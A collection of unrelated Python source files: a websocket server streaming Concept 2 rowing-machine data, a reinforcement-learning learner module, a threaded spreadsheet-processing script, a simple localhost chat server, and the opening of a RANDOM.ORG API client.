threading.Thread(target=pongo_plato, args=[]).start()
threading.Thread(target=gato, args=[]).start()
threading.Thread(target=raton, args=[]).start()
|
ergserver.py
|
#!/usr/bin/env python
# Simple console application that works with pyrow to send data retrieved from
# a connected Concept 2 rowing erg to a client via websockets.
# ==============================================================================
# IMPORTS
# ==============================================================================
# core
import pyrow.pyrow as pyrow # handles connection to ergs
import time # for sleep
import json # for converting data into json strings
import sys # sys.exit
# server
import signal
from optparse import OptionParser
from SimpleWebSocketServer.SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from multiprocessing import Process, Queue
# ==============================================================================
# CLIENT CONNECTION CLASS
# ==============================================================================
class ErgSocket(WebSocket):
# receive message from client
def handleMessage(self):
if self.data is None:
self.data = ''
print("{}: got message: {}".format(self.address, self.data))
# client connected
def handleConnected(self):
print("{}: connected".format(self.address))
# client disconnected
def handleClose(self):
print("{}: closed".format(self.address))
# ==============================================================================
# CORE FUNCTIONS
# ==============================================================================
# take an object, create a formatted message and queue it
def queue_message(message_queue, msg_content, msg_type="TXT", log=True):
message = { 'type': msg_type, 'content': msg_content, 'time': time.clock() }
message_json = json.dumps(message)
message_queue.put(message_json)
if log == True:
if msg_type == "TXT":
print("[SEND] {}".format(str(msg_content)))
else:
print("[SEND] {} ({} bytes)".format(msg_type, len(message_json)))
# monitor a connected erg and send messages to clients connected to the server
def monitor_erg(message_queue, erg):
try:
sleep_time_ms = 5
sleep_time = float(sleep_time_ms) / 1000.0
erg_info = pyrow.pyrow.getErg(erg)
erg_status = pyrow.pyrow.getStatus(erg)
erg_id = erg_info['serial']
message = "Concept 2 erg connected (model {}, serial: {})".format(erg_info['model'], erg_id)
queue_message(message_queue, message);
# wait for workout to begin, then send stroke data
queue_message(message_queue, "Waiting for workout to begin...")
# keep monitoring indefinitely
while True:
workout = erg.getWorkout()
while workout['state'] == 0:
time.sleep(sleep_time)
workout = erg.getWorkout()
# send workout start message
monitor = erg.getMonitor()
queue_message(message_queue, { 'erg_id' : erg_id, 'monitor' : monitor, 'workout' : workout }, msg_type="WORKOUT_START")
# record workout
stroke_id = 0
forceplot = erg.getForcePlot()
while workout['state'] == 1:
# record force data during the drive
force = forceplot['forceplot'] # start of pull (when strokestate first changed to 2)
monitor = erg.getMonitor()
# stroke start message
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'monitor': monitor }, msg_type="STROKE_START", log=False)
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'time': monitor['time'], 'force': forceplot['forceplot'] }, msg_type="STROKE_FORCE", log=False)
# loop during drive (and make sure we get the end of the stroke)
while True:
monitor = erg.getMonitor()
forceplot = erg.getForcePlot()
force.extend(forceplot['forceplot'])
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'time': monitor['time'], 'forceplot': forceplot['forceplot'] }, msg_type="STROKE_FORCE", log=False)
if forceplot['strokestate'] != 2:
break
monitor = erg.getMonitor() # get monitor data for end of stroke
queue_message(message_queue, { 'erg_id': erg_id, 'stroke_id': stroke_id, 'monitor': monitor, 'forceplot': force }, msg_type="STROKE_END", log=False)
print("[{}] time: {}, distance: {}, pace: {}".format(stroke_id, monitor['time'], monitor['distance'], monitor['pace']))
# wait for next stroke
while forceplot['strokestate'] != 2 and workout['state'] == 1:
forceplot = erg.getForcePlot()
workout = erg.getWorkout()
stroke_id += 1
workout = erg.getWorkout()
monitor = erg.getMonitor()
queue_message(message_queue, { 'erg_id': erg_id, 'monitor': monitor, 'workout': workout }, msg_type="WORKOUT_END")
except Exception as e:
print(e)
sys.exit(0)
def main():
# handle command line options
parser = OptionParser(usage="usage: %prog [options]", version="%prog 1.0")
parser.add_option("--host", default='', type='string', action="store", dest="host", help="hostname (localhost)")
parser.add_option("--port", default=8000, type='int', action="store", dest="port", help="port (8000)")
(options, args) = parser.parse_args()
print("Welcome to ErgServer!")
# initialize connection to erg
connected_ergs = pyrow.find()
if len(connected_ergs) == 0:
print("No ergs found.")
else:
print("{} erg(s) found. Starting ErgServer.".format(len(connected_ergs)))
print("(NOTE: This will run forever. Press ctrl+c to quit)")
try:
message_queue = Queue(20)
# connect to erg and monitor it using a new process
erg = pyrow.pyrow(connected_ergs[0])
prc_monitor = Process(target=monitor_erg, args=(message_queue, erg))
prc_monitor.start()
# start the websocket server to accept client connections
erg_server = SimpleWebSocketServer(options.host, options.port, ErgSocket, message_queue)
def close_sig_handler(signal, frame):
erg_server.close()
sys.exit(0)
signal.signal(signal.SIGINT, close_sig_handler)
erg_server.serveforever()
except:
pass
print("Closing ErgServer. See you next time!")
try:
prc_monitor.terminate()
except:
pass
sys.exit(0)
if __name__ == "__main__":
main()
|
learner.py
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Create a module cover the training process within the RL problems."""
import os
import threading
from time import time
from copy import deepcopy
from multiprocessing import Queue, Process
import numpy as np
from absl import logging
from collections import deque, defaultdict
import setproctitle
from xt.environment import env_builder
from xt.framework.trainer import build_alg_with_trainer
from xt.framework.predictor import Predictor
from xt.algorithm.pbt import PbtAid
from zeus.visual.tensorboarder import SummaryBoard
from zeus.common.util.evaluate_xt import make_workspace_if_not_exist, parse_benchmark_args
from zeus.common.ipc.uni_comm import UniComm
from zeus.common.ipc.message import message, get_msg_data, set_msg_info, set_msg_data, get_msg_info
from zeus.common.util.common import bytes_to_str
from zeus.common.util.hw_cloud_helper import mox_makedir_if_not_existed
from zeus.common.util.logger import Logger, StatsRecorder
from zeus.common.util.profile_stats import PredictStats, TimerRecorder
class Learner(object):
"""Learner manage the train-processing of whole RL pipe-line."""
def __init__(
self,
alg_para,
env_para,
agent_para,
eval_adapter=None,
data_url=None,
benchmark_info=None,
name="T0",
):
self._name = name
self.alg_para = deepcopy(alg_para)
self.process_num = self.alg_para.get("process_num", 1)
self.eval_adapter = eval_adapter
self.train_worker = None
self.send_train = None
self.send_predict = UniComm("ShareByPlasma")
self.send_broker = None
self.send_broker_predict = Queue()
self.stats_deliver = None
self.train_lock = threading.Lock()
self.alg = None
self.trainer = None
self.shared_buff = None
_model_dir = ["models", "benchmark"]
self.bm_args = \
parse_benchmark_args(env_para, alg_para, agent_para, benchmark_info)
self.workspace, _archive, _job = \
make_workspace_if_not_exist(self.bm_args, _model_dir, task_name=self._name)
self.bm_board = SummaryBoard(_archive, _job)
self.model_path = os.path.join(self.workspace, _model_dir[0])
logging.info("{}\nworkspace:\n\t{}\n".format("*" * 10, self.workspace))
self.max_step = agent_para.get("agent_config", {}).get("complete_step")
self.max_episode = agent_para.get("agent_config", {}).get("complete_episode")
self._log_interval = benchmark_info.get("log_interval_to_train", 10)
self._explorer_ids = list()
self._pbt_aid = None
# For Cloud
self.s3_path = None
if data_url is not None:
self.s3_path = os.path.join(data_url, _model_dir[0])
mox_makedir_if_not_existed(self.s3_path)
def add_to_pbt(self, pbt_config, metric, weights):
"""Add this lerner to population."""
self._pbt_aid = PbtAid(self.name, self.alg_para, pbt_config, metric, weights)
@property
def explorer_ids(self):
return self._explorer_ids
@explorer_ids.setter
def explorer_ids(self, val):
self._explorer_ids = val
@property
def name(self):
return self._name
def async_predict(self):
"""Create predict thread."""
predict = [
PredictThread(
i,
self.alg,
self.send_predict,
self.send_broker,
self.stats_deliver,
self.train_lock,
)
for i in range(2)
]
predict_thread = [threading.Thread(target=t.predict) for t in predict]
for t in predict_thread:
t.setDaemon(True)
t.start()
def create_predictor(self):
"""Create predictor."""
config_info = {'alg_para': self.alg_para}
predictor = Predictor(0, config_info, self.send_predict,
self.send_broker_predict, self._name)
# self.send_predict = predictor.request_q
# print("send predict", self.send_predict)
p = Process(target=predictor.start)
p.daemon = True
p.start()
def init_async_train(self):
"""Create train worker."""
self.train_worker = TrainWorker(
self.send_train,
self.alg,
self.train_lock,
self.model_path,
self.send_broker,
self.s3_path,
self.max_step,
self.max_episode,
self.stats_deliver,
self.eval_adapter,
log_interval=self._log_interval,
name=self._name
)
self.train_worker.explorer_ids = self.explorer_ids
self.train_worker.pbt_aid = self._pbt_aid
def submit_algorithm(self, alg_instance, trainer_obj, shared_buff):
"""Submit an algorithm, to update algorithm instance description."""
self.alg = alg_instance
self.trainer = trainer_obj
self.shared_buff = shared_buff
def start(self):
"""Start all system."""
self.create_predictor()
alg, trainer_obj, shared_list = build_alg_with_trainer(
deepcopy(self.alg_para), self.send_broker, self.model_path, self.process_num
)
self.submit_algorithm(alg, trainer_obj, shared_list)
# self.async_predict()
self.init_async_train()
def main_loop(self):
"""Run with while True, cover the working loop."""
self.train_worker.train()
# user operation after train process
class TrainWorker(object):
"""TrainWorker Process manage the trajectory data set and optimizer."""
def __init__(
self,
train_q,
alg,
lock,
model_path,
model_q,
s3_path,
max_step,
max_episode,
stats_deliver,
eval_adapter=None,
**kwargs,
):
self.train_q = train_q
self.alg = alg
self.lock = lock
self.model_path = model_path
self.model_q = model_q
self.actor_reward = defaultdict(float)
self.actor_trajectory = defaultdict(int)
self.rewards = []
self.s3_path = s3_path
self.max_step = max_step
self.actual_step = 0
self.name = kwargs.get('name', 'T0')
self.max_episode = max_episode
self.elapsed_episode = 0 # off policy, elapsed_episode > train count
self.won_in_episodes = deque(maxlen=256)
self.train_count = 0
self.stats_deliver = stats_deliver
self.e_adapter = eval_adapter
self.logger = Logger(os.path.dirname(model_path))
self._metric = TimerRecorder("leaner_model", maxlen=50,
fields=("fix_weight", "send"))
self._log_interval = kwargs["log_interval"]
self._explorer_ids = None
self._pbt_aid = None
self._train_data_counter = defaultdict(int)
@property
def explorer_ids(self):
return self._explorer_ids
@explorer_ids.setter
def explorer_ids(self, val):
self._explorer_ids = val
@property
def pbt_aid(self):
return self._pbt_aid
@pbt_aid.setter
def pbt_aid(self, val):
self._pbt_aid = val
def _dist_policy(self, weight=None, save_index=-1, dist_cmd="explore"):
"""Distribute model tool."""
explorer_set = self.explorer_ids
ctr_info = self.alg.dist_model_policy.get_dist_info(save_index, explorer_set)
if isinstance(ctr_info, dict):
ctr_info = [ctr_info]
for _ctr in ctr_info:
to_send_data = message(weight, cmd=dist_cmd, **_ctr)
self.model_q.send(to_send_data)
def _handle_eval_process(self, loss):
if not self.e_adapter:
return
if self.e_adapter.if_eval(self.train_count):
weights = self.alg.get_weights()
self.e_adapter.to_eval(weights,
self.train_count,
self.actual_step,
self.logger.elapsed_time,
self.logger.train_reward,
loss)
elif not self.e_adapter.eval_result_empty:
eval_ret = self.e_adapter.fetch_eval_result()
if eval_ret:
logging.debug("eval stats: {}".format(eval_ret))
self.stats_deliver.send({"data": eval_ret, "is_bm": True}, block=True)
def _meet_stop(self):
if self.max_step and self.actual_step > self.max_step:
return True
# Under pbt set, the max_episode need set into pbt_config
# Owing to the reset of episode count after each pbt.exploit
if self.max_episode and self.elapsed_episode > self.max_episode:
return True
return False
def train(self):
"""Train model."""
if not self.alg.async_flag:
policy_weight = self.alg.get_weights()
self._dist_policy(weight=policy_weight)
loss = 0
while True:
for _tf_val in range(self.alg.prepare_data_times):
# logging.debug("wait data for preparing-{}...".format(_tf_val))
with self.logger.wait_sample_timer:
data = self.train_q.recv()
with self.logger.prepare_data_timer:
data = bytes_to_str(data)
self.record_reward(data)
self.alg.prepare_data(data["data"], ctr_info=data["ctr_info"])
# dqn series algorithm will count the 'SARSA' as one episode.
# and, episodic count will used for train ready flag.
# each pbt exploit.step will reset the episodic count.
self.elapsed_episode += 1
# logging.debug("Prepared data-{}.".format(_tf_val))
# support sync model before
# run pbt if need.
if self.pbt_aid:
if self.pbt_aid.meet_stop(self.elapsed_episode):
break
cur_info = dict(episodic_reward_mean=self.logger.train_reward_avg,
elapsed_step=self.actual_step,
elapsed_episode=self.elapsed_episode)
new_alg = self.pbt_aid.step(cur_info, cur_alg=self.alg)
if new_alg: # re-assign algorithm if need
self.alg = new_alg
if not self.alg.async_flag:
policy_weight = self.alg.get_weights()
self._dist_policy(weight=policy_weight)
continue
if self._meet_stop():
self.stats_deliver.send(self.logger.get_new_info(), block=True)
break
if not self.alg.train_ready(self.elapsed_episode, dist_dummy_model=self._dist_policy):
continue
with self.lock, self.logger.train_timer:
# logging.debug("start train process-{}.".format(self.train_count))
loss = self.alg.train(episode_num=self.elapsed_episode)
if type(loss) in (float, np.float64, np.float32, np.float16, np.float):
self.logger.record(train_loss=loss)
with self.lock:
if self.alg.if_save(self.train_count):
_name = self.alg.save(self.model_path, self.train_count)
# logging.debug("to save model: {}".format(_name))
self._handle_eval_process(loss)
# The requirement of distribute model is checkpoint ready.
if not self.alg.async_flag and self.alg.checkpoint_ready(self.train_count):
_save_t1 = time()
policy_weight = self.alg.get_weights()
self._metric.append(fix_weight=time() - _save_t1)
_dist_st = time()
self._dist_policy(policy_weight, self.train_count)
self._metric.append(send=time() - _dist_st)
self._metric.report_if_need()
else:
if self.alg.checkpoint_ready(self.train_count):
policy_weight = self.alg.get_weights()
weight_msg = message(policy_weight, cmd="predict{}".format(self.name), sub_cmd='sync_weights')
self.model_q.send(weight_msg)
if self.train_count % self._log_interval == 0:
self.stats_deliver.send(self.logger.get_new_info(), block=True)
self.train_count += 1
def record_reward(self, train_data):
"""Record reward in train."""
broker_id = get_msg_info(train_data, 'broker_id')
explorer_id = get_msg_info(train_data, 'explorer_id')
agent_id = get_msg_info(train_data, 'agent_id')
key = (broker_id, explorer_id, agent_id)
# key = learner_stats_id(train_data["ctr_info"])
# record the train_data received
self._train_data_counter[key] += 1
self.alg.dist_model_policy.add_processed_ctr_info(key)
data_dict = get_msg_data(train_data)
# update multi agent train reward without done flag
if self.alg.alg_name in ("QMixAlg", ): # fixme: unify the record op
self.actual_step += np.sum(data_dict["filled"])
self.won_in_episodes.append(data_dict.pop("battle_won"))
self.logger.update(explore_won_rate=np.nanmean(self.won_in_episodes))
self.logger.record(
step=self.actual_step,
train_reward=np.sum(data_dict["reward"]),
train_count=self.train_count,
)
return
elif self.alg.alg_config['api_type'] == "unified":
self.actual_step += len(data_dict["done"])
self.logger.record(
step=self.actual_step,
train_reward=np.sum(data_dict["reward"]),
train_count=self.train_count,
)
return
data_length = len(data_dict["done"]) # fetch the train data length
for data_index in range(data_length):
reward = data_dict["reward"][data_index]
done = data_dict["done"][data_index]
info = data_dict["info"][data_index]
self.actual_step += 1
if isinstance(info, dict):
self.actor_reward[key] += info.get("eval_reward", reward)
self.actor_trajectory[key] += 1
done = info.get("real_done", done)
if done:
self.logger.record(
step=self.actual_step,
train_count=self.train_count,
train_reward=self.actor_reward[key],
trajectory_length=self.actor_trajectory[key],
)
# logging.debug("{} epi reward-{}. with len-{}".format(
# key, self.actor_reward[key], self.actor_trajectory[key]))
self.actor_reward[key] = 0.0
self.actor_trajectory[key] = 0
class PredictThread(object):
"""Predict Worker for async algorithm."""
def __init__(self, thread_id, alg, request_q, reply_q, stats_deliver, lock):
self.alg = alg
self.thread_id = thread_id
self.request_q = request_q
self.reply_q = reply_q
self.lock = lock
self.stats_deliver = stats_deliver
self._report_period = 200
self._stats = PredictStats()
def predict(self):
"""Predict action."""
while True:
start_t0 = time()
data = self.request_q.recv()
state = get_msg_data(data)
self._stats.obs_wait_time += time() - start_t0
start_t1 = time()
with self.lock:
action = self.alg.predict(state)
self._stats.inference_time += time() - start_t1
set_msg_info(data, cmd="predict_reply")
set_msg_data(data, action)
# logging.debug("msg to explore: ", data)
self.reply_q.send(data)
self._stats.iters += 1
if self._stats.iters > self._report_period:
_report = self._stats.get()
self.stats_deliver.send(_report, block=True)
def patch_model_config_by_env_info(config, env_info):
model_info = config["model_para"]
if "model_config" not in model_info["actor"].keys():
model_info["actor"].update({"model_config": dict()})
model_config = model_info["actor"]["model_config"]
model_config.update({"action_type": env_info.get("action_type")})
return model_info
def patch_alg_within_config(config, node_type="node_config"):
"""combine the algorithm parameters"""
alg_para = config["alg_para"].copy()
agent_para = config["agent_para"]
node_config = config[node_type]
# for quickly run 2s_vs_1sc map
env_attr = {
"state_shape": 27,
# obs_shape with been extend with action&agent id in algorithm!
"obs_shape": 17,
"n_actions": 7,
"n_agents": 2,
"episode_limit": 300,
"api_type": "standalone",
"agent_ids": [0],
}
# get env info
env = env_builder(**config["env_para"])
env_info = env.get_env_info()
env.close()
if "alg_config" not in alg_para:
alg_para["alg_config"] = dict()
alg_para["alg_config"].update(
{
"instance_num": config["env_num"] * len(node_config),
"agent_num": agent_para.get("agent_num", 1),
"env_attr": env_attr,
"api_type": env_info.get("api_type")
}
)
model_info = patch_model_config_by_env_info(config, env_info)
# update env attr into model info
model_info["actor"]["model_config"].update(env_attr)
alg_para["model_info"] = model_info
config.update({"alg_para": alg_para})
return config
def setup_learner(config, eval_adapter, learner_index, data_url=None):
"""Start learner."""
env_para = config["env_para"]
agent_para = config["agent_para"]
alg_para = deepcopy(config["alg_para"])
model_info = alg_para["model_info"]
# set actor.type as learner
model_info["actor"].update({"type": "learner"})
# add benchmark id
bm_info = config.get("benchmark", dict())
learner = Learner(
alg_para,
env_para,
agent_para,
eval_adapter=eval_adapter,
data_url=data_url,
benchmark_info=bm_info,
name="T{}".format(learner_index)
)
learner.config_info = config
return learner
def learner_stats_id(ctr_info):
"""Assemble stats id."""
broker_id = ctr_info.get('broker_id')
explorer_id = ctr_info.get('explorer_id')
agent_id = ctr_info.get('agent_id')
return "_".join(map(str, (broker_id, explorer_id, agent_id)))
|
process_data_fast.py
|
import glob
from process_data import process
import tqdm
if __name__=="__main__":
import threading
THREADS = 4
queue = []
for fname in tqdm.tqdm(glob.glob("/storage/PawelLab/wwydmanski/NCBR-COVID/FTP_DATA/data/upload/pacjenci 201-250/*/*.xls")):
queue.append(threading.Thread(target=process, args=(fname,)))
queue[-1].start()
if len(queue)>=THREADS:
for i in queue:
i.join()
queue = []
|
chat_server.py
|
import socket
from threading import *
def send_msg(socket):
while True:
msg = input()
socket.send(bytes(msg,"utf-8"))
# creates the socket
server = socket.socket()
PORT = 1234
# bind the socket to the port.
server.bind(('localhost',PORT)) # takes a tuple
# at most 5 connections in the queue
server.listen(5)
print("Listening for clients to connect")
# Establish connection with client.
client, addr = server.accept()
print('Got connection from', addr)
Thread(target=send_msg, args=(client, )).start()
msg = client.recv(1024)
print(msg.decode("utf-8"))
while msg :
msg = client.recv(1024)
print(msg.decode("utf-8"))
client.close()
|
rdoclient.py
|
"""
RANDOM.ORG JSON-RPC API (Release 1) implementation.
This is a Python implementation of the RANDOM.ORG JSON-RPC API (R1).
It provides either serialized or unserialized access to both the signed
and unsigned methods of the API through the RandomOrgClient class. It
also provides a convenience class through the RandomOrgClient class,
the RandomOrgCache, for precaching requests.
Classes:
RandomOrgClient -- main class through which API functions are accessed.
RandomOrgCache -- for precaching API responses.
RandomOrgSendTimeoutError -- when request can't be sent in a set time.
RandomOrgKeyNotRunningError -- key stopped exception.
RandomOrgInsufficientRequestsError -- requests allowance exceeded.
RandomOrgInsufficientBitsError -- bits allowance exceeded.
My changes seem to work for me, but I make no guarantees! (RevMask)
"""
import json
import logging
import threading
import time
import uuid
from datetime import datetime
from queue import Queue, Empty
import requests
# Basic RANDOM.ORG API functions https://api.random.org/json-rpc/1/
_INTEGER_METHOD = 'generateIntegers'
_DECIMAL_FRACTION_METHOD = 'generateDecimalFractions'
_GAUSSIAN_METHOD = 'generateGaussians'
_STRING_METHOD = 'generateStrings'
_UUID_METHOD = 'generateUUIDs'
_BLOB_METHOD = 'generateBlobs'
_GET_USAGE_METHOD = 'getUsage'
# Signed RANDOM.ORG API functions https://api.random.org/json-rpc/1/signing
_SIGNED_INTEGER_METHOD = 'generateSignedIntegers'
_SIGNED_DECIMAL_FRACTION_METHOD = 'generateSignedDecimalFractions'
_SIGNED_GAUSSIAN_METHOD = 'generateSignedGaussians'
_SIGNED_STRING_METHOD = 'generateSignedStrings'
_SIGNED_UUID_METHOD = 'generateSignedUUIDs'
_SIGNED_BLOB_METHOD = 'generateSignedBlobs'
_VERIFY_SIGNATURE_METHOD = 'verifySignature'
# Blob format literals
_BLOB_FORMAT_BASE64 = 'base64'
_BLOB_FORMAT_HEX = 'hex'
# Default backoff to use if no advisoryDelay backoff supplied by server
_DEFAULT_DELAY = 1.0
# On request fetch fresh allowance state if current state data is older than this value
_ALLOWANCE_STATE_REFRESH_SECONDS = 3600.0
class RandomOrgSendTimeoutError(Exception):
"""
RandomOrgClient blocking_timeout exception.
Exception raised by the RandomOrgClient class when blocking_timeout
is exceeded before the request can be sent.
"""
class RandomOrgKeyNotRunningError(Exception):
"""
RandomOrgClient key stopped exception.
Exception raised by the RandomOrgClient class when its API key
has been stopped. Requests will not complete while API key is
in the stopped state.
"""
class RandomOrgInsufficientRequestsError(Exception):
"""
RandomOrgClient server requests allowance exceeded exception.
Exception raised by the RandomOrgClient class when its API key's
server requests allowance has been exceeded. This indicates that a
back-off until midnight UTC is in effect, before which no requests
will be sent by the client as no meaningful server responses will
be returned.
"""
class RandomOrgInsufficientBitsError(Exception):
"""
RandomOrgClient server bits allowance exceeded exception.
Exception raised by the RandomOrgClient class when its API key's
request has exceeded its remaining server bits allowance. If the
client is currently issuing large requests it may be possible to
succeed with smaller requests. Use the client's getBitsLeft() call
to help determine if an alternative request size is appropriate.
"""
class RandomOrgCache(object):
"""
RandomOrgCache for precaching request responses.
Precache for frequently used requests. Instances should only be
obtained using RandomOrgClient's create_x_cache methods, never
created separately.
This class strives to keep a Queue of response results populated
for instant access via its public get method. Work is done by a
background Thread, which issues the appropriate request at suitable
intervals.
Public methods:
stop -- instruct cache to stop repopulating itself.
resume -- if cache is stopped, restart repopulation.
get -- return a response for the request this RandomOrgCache
represents or raise a Queue.Empty exception.
"""
def __init__(self, request_function, process_function, request,
cache_size, bulk_request_number=0, request_number=0):
"""
Constructor.
Initialize class and start Queue population Thread running as a
daemon. Should only be called by RandomOrgClient's
create_x_cache methods.
Keyword arguments:
request_function -- function to send supplied request to server.
process_function -- function to process result of
request_function into expected output.
request -- request to send to server via request_function.
cache_size -- number of request responses to try maintain.
bulk_request_number -- if request is set to be issued in bulk,
number of result sets in a bulk request (default 0).
request_number -- if request is set to be issued in bulk,
number of results in a single request (default 0).
"""
self._request_function = request_function
self._process_function = process_function
self._request = request
self._queue = Queue(cache_size)
self._bulk_request_number = bulk_request_number
self._request_number = request_number
# Condition lock to allow notification when an item is consumed
# or pause state is updated.
self._lock = threading.Condition()
self._paused = False
# Thread to keep RandomOrgCache populated.
self._thread = threading.Thread(target=self._populate_queue)
self._thread.daemon = True
self._thread.start()
def _populate_queue(self):
# Keep issuing requests to server until Queue is full. When
# Queue is full if requests are being issued in bulk, wait
# until Queue has enough space to accomodate all of a bulk
# request before issuing a new request, otherwise issue a new
# request every time an item in the Queue has been consumed.
#
# Note that requests to the server are blocking, i.e., only one
# request will be issued by the cache at any given time.
while True:
while self._paused:
self._lock.acquire()
self._lock.wait()
self._lock.release()
# If we're issuing bulk requests...
if self._bulk_request_number > 0:
# Is there space for a bulk response in the queue?
if self._queue.qsize() < (self._queue.maxsize - self._bulk_request_number):
# Issue and process request and response.
try:
response = self._request_function(self._request)
result = self._process_function(response)
# Split bulk response into result sets.
for i in range(0, len(result), self._request_number):
self._queue.put(result[i:i+self._request_number])
except Exception as e:
# Don't handle failures from _request_function()
# Just try again later.
logging.info("RandomOrgCache populate Exception: " + str(e))
# No space, sleep and wait for consumed notification.
else:
self._lock.acquire()
self._lock.wait()
self._lock.release()
# Not in bulk mode, repopulate queue as it empties.
elif not self._queue.full():
try:
response = self._request_function(self._request)
self._queue.put(self._process_function(response))
except Exception as e:
# Don't handle failures from _request_function()
# Just try again later.
logging.info("RandomOrgCache populate Exception: " + str(e))
# No space, sleep and wait for consumed notification.
else:
self._lock.acquire()
self._lock.wait()
self._lock.release()
def stop(self):
"""
Stop cache.
Cache will not contine to populate itself.
"""
self._paused = True
self._lock.acquire()
self._lock.notify()
self._lock.release()
def resume(self):
"""
Resume cache.
Cache will resume populating itself if stopped.
"""
self._paused = False
self._lock.acquire()
self._lock.notify()
self._lock.release()
def get(self):
"""
Get next response.
Get next appropriate response for the request this
RandomOrgCache represents or if Queue is empty raise a
Queue.Empty exception.
"""
result = self._queue.get(False)
self._lock.acquire()
self._lock.notify()
self._lock.release()
return result
class RandomOrgClient(object):
"""
RandomOrgClient main class through which API functions are accessed.
This class provides either serialized or unserialized (determined
on class creation) access to both the signed and unsigned methods
of the RANDOM.ORG API. These are threadsafe and implemented as
blocking remote procedure calls.
If requests are to be issued serially a background Thread will
maintain a Queue of requests to process in sequence.
The class also provides access to creation of a convenience class,
RandomOrgCache, for precaching API responses when the request is
known in advance.
This class will only allow the creation of one instance per API
key. If an instance of this class already exists for a given key,
that instance will be returned on init instead of a new instance.
This class obeys most of the guidelines set forth in
https://api.random.org/guidelines
All requests respect the server's advisoryDelay returned in any
responses, or use _DEFAULT_DELAY if no advisoryDelay is returned. If
the supplied API key is has exceeded its daily request allowance,
this implementation will back off until midnight UTC.
Public methods:
Basic methods for generating randomness, see:
https://api.random.org/json-rpc/1/basic
generate_integers -- get a list of random integers.
generate_decimal_fractions -- get a list of random doubles.
generate_gaussians -- get a list of random numbers.
generate_strings -- get a list of random strings.
generate_UUIDs -- get a list of random UUIDs.
generate_blobs -- get a list of random blobs.
Signed methods for generating randomness, see:
https://api.random.org/json-rpc/1/signing
generate_signed_integers -- get a signed response containing a list
of random integers and a signature.
generate_signed_decimal_fractions -- get a signed response
containing a list of random doubles and a signature.
generate_signed_gaussians -- get a signed response containing a
list of random numbers and a signature.
generate_signed_strings -- get a signed response containing a list
of random strings and a signature.
generate_signed_UUIDs -- get a signed response containing a list of
random UUIDs and a signature.
generate_signed_blobs -- get a signed response containing a list of
random blobs and a signature.
Signature verification for signed methods, see:
https://api.random.org/json-rpc/1/signing
verify_signature -- verify a response against its signature.
# Methods used to create a cache for any given randomness request.
create_integer_cache -- get a RandomOrgCache from which to obtain a
list of random integers.
create_decimal_fraction_cache -- get a RandomOrgCache from which to
obtain a list of random doubles.
create_gaussian_cache -- get a RandomOrgCache from which to obtain
a list of random numbers.
create_string_cache -- get a RandomOrgCache from which to obtain a
list of random strings.
create_UUID_cache -- get a RandomOrgCache from which to obtain a
list of random UUIDs.
create_blob_cache -- get a RandomOrgCache from which to obtain a
list of random blobs.
# Methods for accessing server usage statistics
get_requests_left -- get estimated number of remaining API requests.
get_bits_left -- get estimated number of bits left.
"""
# Maintain a dictionary of API keys and their instances.
__key_indexed_instances = {}
def __new__(cls, *args, **kwds):
"""
Instance creation.
Ensure only one instace of RandomOrgClient exists per API key.
Create a new instance if the supplied key isn't already known,
otherwise return the previously instantiated one.
"""
instance = RandomOrgClient.__key_indexed_instances.get(args[0], None)
if instance is None:
instance = object.__new__(cls)
RandomOrgClient.__key_indexed_instances[args[0]] = instance
return instance
def __init__(self, api_key,
blocking_timeout=24.0*60.0*60.0, http_timeout=120.0, serialized=True):
"""
Constructor.
Initialize class and start serialized request sending Thread
running as a daemon if applicable.
Keyword arguments:
api_key -- API key obtained from the RANDOM.ORG website, see:
https://api.random.org/api-keys
blocking_timeout -- maximum time in seconds and fractions of
seconds to wait before being allowed to send a request.
Note this is a hint not a guarantee. Be advised advisory
delay from server must always be obeyed. Supply a value
of -1 to allow blocking forever. (default 24.0*60.0*60.0,
i.e., 1 day)
http_timeout -- maximum time in seconds and fractions of
seconds to wait for the server response to a request.
(default 120.0).
serialized -- determines whether or not requests from this
instance will be added to a Queue and issued serially or
sent when received, obeying any advisory delay (default
True).
"""
# __init__ will always be called after __new__, but if an
# instance already exists for the API key we want to bail
# before actually doing anything in init.
if not hasattr(self, '_api_key'):
if serialized:
# set send function
self._send_request = self._send_serialized_request
# set up the serialized request Queue and Thread
self._serialized_queue = Queue()
self._serialized_thread = threading.Thread(target=self._threaded_request_sending)
self._serialized_thread.daemon = True
self._serialized_thread.start()
else:
# set send function
self._send_request = self._send_unserialized_request
self._api_key = api_key
self._blocking_timeout = blocking_timeout
self._http_timeout = http_timeout
# maintain info to obey server advisory delay
self._advisory_delay_lock = threading.Lock()
self._advisory_delay = 0
self._last_response_received_time = 0
# maintain usage statistics from server
self._requests_left = None
self._bits_left = None
# backoff info for when API key is detected as not running -
# probably because key has exceeded its daily usage limit.
# Backoff runs until midnight UTC.
self._backoff = None
self._backoff_error = None
else:
logging.info("Using RandomOrgClient instance already created for key \"" + api_key + "\"")
# Basic methods for generating randomness, see:
# https://api.random.org/json-rpc/1/basic
def generate_integers(self, n, min, max, replacement=True):
"""
Generate random integers.
Request and return a list (size n) of true random integers
within a user-defined range from the server. See:
https://api.random.org/json-rpc/1/basic#generateIntegers
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
